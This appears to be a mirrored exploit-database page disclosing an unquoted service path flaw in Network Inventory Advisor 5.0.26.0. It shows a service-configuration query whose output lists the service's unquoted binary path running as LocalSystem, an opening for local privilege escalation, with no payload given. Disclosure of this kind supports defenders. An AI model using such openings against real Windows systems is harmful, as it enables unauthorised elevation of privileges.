Network inventory advisor 5.0.26.0 niaservice unquoted service path Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-11-05 | Type : local | Platform : windows
This exploit / vulnerability Network inventory advisor 5.0.26.0 niaservice unquoted service path is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Network Inventory Advisor 5.0.26.0 - 'niaservice' Unquoted Service Path
# Date: 2019-11-04
# Exploit Author: Samuel DiazL
# Vendor Homepage: https://www.network-inventory-advisor.com/
# Software Link: https://www.network-inventory-advisor.com/download.html
# Version: 5.0.26.0
# Tested on: Microsoft Windows 10 Enterprise x64 ESP
# CVE: N/A

# Description:
# Network Inventory Advisor installs niaservice as a service with an unquoted service path

C:\Users\SD502812>sc qc niaservice
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: niaservice
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ClearApps\Network Inventory Advisor\niaservice.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Network Inventory Advisor Service by ClearApps Software
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem